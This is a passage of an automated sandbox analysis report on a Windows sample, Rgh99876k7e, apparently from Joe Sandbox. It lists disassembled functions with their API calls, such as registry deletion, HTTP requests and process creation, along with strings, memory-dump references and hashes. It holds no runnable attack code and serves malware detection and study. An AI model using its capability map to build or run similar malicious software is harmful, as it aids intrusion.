                            • Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00720195
                            • Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007201A0
                          • ___scrt_fastfail.LIBCMT ref: 007200E7
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          Strings
                          • WakeAllConditionVariable, xrefs: 00720162
                          • kernel32.dll, xrefs: 00720133
                          • SleepConditionVariableCS, xrefs: 00720154
                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00720122
                          • InitializeConditionVariable, xrefs: 00720148
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 66158676-1714406822
                          • Opcode ID: ce1dcba0835ed685790824bc3a8466a711f15996167a65925311f29a47b71cb5
                          • Instruction ID: 3886bbd3b403c4c8c0cef0958bf1f4e31fb5346db007a98fa76b5f10f84d0388
                          • Opcode Fuzzy Hash: ce1dcba0835ed685790824bc3a8466a711f15996167a65925311f29a47b71cb5
                          • Instruction Fuzzy Hash: 4621F9B2645724ABEF115B74BC0AB6E33A4DB05B61F00412BF801E62D2DB7C98108AE8
                          Function 007744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(00000000,00000000,0079CC08), ref: 00774527
                          • _wcslen.LIBCMT ref: 0077453B
                          • _wcslen.LIBCMT ref: 00774599
                          • _wcslen.LIBCMT ref: 007745F4
                          • _wcslen.LIBCMT ref: 0077463F
                          • _wcslen.LIBCMT ref: 007746A7
                            • Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD
                          • GetDriveTypeW.KERNEL32(?,007C6BF0,00000061), ref: 00774743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharDriveLowerType
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2055661098-1000479233
                          • Opcode ID: 5ecd731d13e0f3426f538799edea8fec7f48d41f922276ffd51db36674426fae
                          • Instruction ID: d54de49e7fd6d2a6e3326a99ea7738f587d7b4892a7ed8f05afb05ceb46a1be6
                          • Opcode Fuzzy Hash: 5ecd731d13e0f3426f538799edea8fec7f48d41f922276ffd51db36674426fae
                          • Instruction Fuzzy Hash: 10B1F571608302DFCB14DF28C894A6AB7E5BF957A0F508A1DF49AC7291D738DD44CB92
                          Function 0079911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DragQueryPoint.SHELL32(?,?), ref: 00799147
                            • Part of subcall function 00797674: ClientToScreen.USER32(?,?), ref: 0079769A
                            • Part of subcall function 00797674: GetWindowRect.USER32(?,?), ref: 00797710
                            • Part of subcall function 00797674: PtInRect.USER32(?,?,00798B89), ref: 00797720
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007991B0
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007991BB
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007991DE
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00799225
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0079923E
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00799255
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00799277
                          • DragFinish.SHELL32(?), ref: 0079927E
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00799371
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#}
                          • API String ID: 221274066-1593647580
                          • Opcode ID: 8c72b4027d75e292475058ac47ce84e2c0b81d3d60401f293165c658130949bc
                          • Instruction ID: 5423412cc82a2c5c772bbee2e3c424b456c80feaedfddfd82468a576110ec5e4
                          • Opcode Fuzzy Hash: 8c72b4027d75e292475058ac47ce84e2c0b81d3d60401f293165c658130949bc
                          • Instruction Fuzzy Hash: 85615D71108301EFD701DF64DC89DAFBBE8EF85750F404A1EF695921A1DB349A45CB62
                          Function 0078AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0078B198
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1B0
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1D4
                          • _wcslen.LIBCMT ref: 0078B200
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B214
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B236
                          • _wcslen.LIBCMT ref: 0078B332
                            • Part of subcall function 007705A7: GetStdHandle.KERNEL32(000000F6), ref: 007705C6
                          • _wcslen.LIBCMT ref: 0078B34B
                          • _wcslen.LIBCMT ref: 0078B366
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078B3B6
                          • GetLastError.KERNEL32(00000000), ref: 0078B407
                          • CloseHandle.KERNEL32(?), ref: 0078B439
                          • CloseHandle.KERNEL32(00000000), ref: 0078B44A
                          • CloseHandle.KERNEL32(00000000), ref: 0078B45C
                          • CloseHandle.KERNEL32(00000000), ref: 0078B46E
                          • CloseHandle.KERNEL32(?), ref: 0078B4E3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                          • String ID:
                          • API String ID: 2178637699-0
                          • Opcode ID: fefa5845b1c792ef8d50a733a4648c222d6e94cede232f74738443ef1975bfaa
                          • Instruction ID: 7470f8141705f2fb7a46a0a2be684f1efc459676f89c690714f24b9474647ef0
                          • Opcode Fuzzy Hash: fefa5845b1c792ef8d50a733a4648c222d6e94cede232f74738443ef1975bfaa
                          • Instruction Fuzzy Hash: 94F19C31608340DFCB14EF24C895B6EBBE5AF85314F18855DF8999B2A2CB39EC45CB52
                          Function 0070326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemCount.USER32(007D1990), ref: 00742F8D
                          • GetMenuItemCount.USER32(007D1990), ref: 0074303D
                          • GetCursorPos.USER32(?), ref: 00743081
                          • SetForegroundWindow.USER32(00000000), ref: 0074308A
                          • TrackPopupMenuEx.USER32(007D1990,00000000,?,00000000,00000000,00000000), ref: 0074309D
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007430A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                          • String ID: 0
                          • API String ID: 36266755-4108050209
                          • Opcode ID: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
                          • Instruction ID: 1e8243fcb240387636556c92daba3e0b8b03affd4b1dbaf9f87defab7c7f8970
                          • Opcode Fuzzy Hash: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
                          • Instruction Fuzzy Hash: F7712931640215FFEB218F24CC49FAABFA9FF05324F204206F529A61E1C7B9A965C750
                          Function 00796CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00796DEB
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00796E5F
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00796E81
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796E94
                          • DestroyWindow.USER32(?), ref: 00796EB5
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00700000,00000000), ref: 00796EE4
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796EFD
                          • GetDesktopWindow.USER32 ref: 00796F16
                          • GetWindowRect.USER32(00000000), ref: 00796F1D
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00796F35
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00796F4D
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                          • String ID: 0$tooltips_class32
                          • API String ID: 2429346358-3619404913
                          • Opcode ID: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
                          • Instruction ID: 1572c0ef118eb5a285e53ef361a54d8370cce0199a4ec013bb63fcfcbf5c1183
                          • Opcode Fuzzy Hash: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
                          • Instruction Fuzzy Hash: CE7167B0104240AFDB21CF18E858FBABBF9FB89304F44465EF98997261C778E906CB15
                          Function 0077C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C4B0
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C4C3
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C4D7
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0077C4F0
                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0077C533
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0077C549
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C554
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C584
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C5DC
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C5F0
                          • InternetCloseHandle.WININET(00000000), ref: 0077C5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                          • String ID:
                          • API String ID: 3800310941-3916222277
                          • Opcode ID: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
                          • Instruction ID: d1b05852f069b79d8451eff984867a62f3351fae221299eba7f4709a6c118e18
                          • Opcode Fuzzy Hash: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
                          • Instruction Fuzzy Hash: 8C514DB1500604BFDF228FA0C988AAB7BBCFF08794F10841EF94996210DB39E9559B60
                          Function 0079856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00798592
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985A2
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985AD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985BA
                          • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985C8
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985D7
                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985E0
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985E7
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985F8
                          • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0079FC38,?), ref: 00798611
                          • GlobalFree.KERNEL32(00000000), ref: 00798621
                          • GetObjectW.GDI32(?,00000018,?), ref: 00798641
                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00798671
                          • DeleteObject.GDI32(?), ref: 00798699
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007986AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
                          • Instruction ID: a6cea2f631b3ce83ee15345142d163e559fcc4a50b0823364b32050d84cfc77e
                          • Opcode Fuzzy Hash: db6dfeabde939d8df8a536772c323d0b3b387bcffb66ffdcee87cf4e19724e5e
                          • Instruction Fuzzy Hash: A2410C75600208AFDF11DFA5DD48EAA7BB8FF89711F108059F905EB260DB789D02CB65
                          Function 007714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00771502
                          • VariantCopy.OLEAUT32(?,?), ref: 0077150B
                          • VariantClear.OLEAUT32(?), ref: 00771517
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007715FB
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00771657
                          • VariantInit.OLEAUT32(?), ref: 00771708
                          • SysFreeString.OLEAUT32(?), ref: 0077178C
                          • VariantClear.OLEAUT32(?), ref: 007717D8
                          • VariantClear.OLEAUT32(?), ref: 007717E7
                          • VariantInit.OLEAUT32(00000000), ref: 00771823
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 1234038744-3931177956
                          • Opcode ID: ea58d137bab166ad938f5d43e620c2d0e939244550c7a00a2f5fdeea1b6cfe03
                          • Instruction ID: 7dbaf52b4649bfecd505218bb8d9f5b68141c217175d5a4afe10b4df68e03e1f
                          • Opcode Fuzzy Hash: ea58d137bab166ad938f5d43e620c2d0e939244550c7a00a2f5fdeea1b6cfe03
                          • Instruction Fuzzy Hash: 68D11471A00105EBDF089F68D889BBDB7B5BF44740F94C156E44AAB180DB3CEC51DBA1
                          Function 0078B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078B6F4
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078B772
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0078B80A
                          • RegCloseKey.ADVAPI32(?), ref: 0078B87E
                          • RegCloseKey.ADVAPI32(?), ref: 0078B89C
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0078B8F2
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0078B904
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0078B922
                          • FreeLibrary.KERNEL32(00000000), ref: 0078B983
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078B994
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 146587525-4033151799
                          • Opcode ID: 9fee26faecc1e18bd0e7302e9ab2a5cffbd751975a048df93b43b084da761fee
                          • Instruction ID: 0148b5582770374f6c4bb02ea3601283a4afbd54c0601012714159169ca38a8a
                          • Opcode Fuzzy Hash: 9fee26faecc1e18bd0e7302e9ab2a5cffbd751975a048df93b43b084da761fee
                          • Instruction Fuzzy Hash: 4CC18E71204201EFD715EF14C499F2ABBE5BF84318F14859DF59A8B2A2CB39EC45CB91
                          Function 0078255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 007825D8
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007825E8
                          • CreateCompatibleDC.GDI32(?), ref: 007825F4
                          • SelectObject.GDI32(00000000,?), ref: 00782601
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0078266D
                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007826AC
                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007826D0
                          • SelectObject.GDI32(?,?), ref: 007826D8
                          • DeleteObject.GDI32(?), ref: 007826E1
                          • DeleteDC.GDI32(?), ref: 007826E8
                          • ReleaseDC.USER32(00000000,?), ref: 007826F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 4b4f99b6ed4fe38feb49aa0b1fc78c0ddb5da5aa99615e6b5b4cb38eb11a2489
                          • Instruction ID: d5461daa8f1232261d388313615f24ab28ca4edc37d956c031a5d1f234ebee7a
                          • Opcode Fuzzy Hash: 4b4f99b6ed4fe38feb49aa0b1fc78c0ddb5da5aa99615e6b5b4cb38eb11a2489
                          • Instruction Fuzzy Hash: 526115B5D00209EFCF05DFA8D884AAEBBB5FF48310F20841AE555A7250E734A941CF64
                          Function 0073DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0073DAA1
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D659
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D66B
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D67D
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D68F
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6A1
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6B3
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6C5
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6D7
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6E9
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D6FB
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D70D
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D71F
                            • Part of subcall function 0073D63C: _free.LIBCMT ref: 0073D731
                          • _free.LIBCMT ref: 0073DA96
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073DAB8
                          • _free.LIBCMT ref: 0073DACD
                          • _free.LIBCMT ref: 0073DAD8
                          • _free.LIBCMT ref: 0073DAFA
                          • _free.LIBCMT ref: 0073DB0D
                          • _free.LIBCMT ref: 0073DB1B
                          • _free.LIBCMT ref: 0073DB26
                          • _free.LIBCMT ref: 0073DB5E
                          • _free.LIBCMT ref: 0073DB65
                          • _free.LIBCMT ref: 0073DB82
                          • _free.LIBCMT ref: 0073DB9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
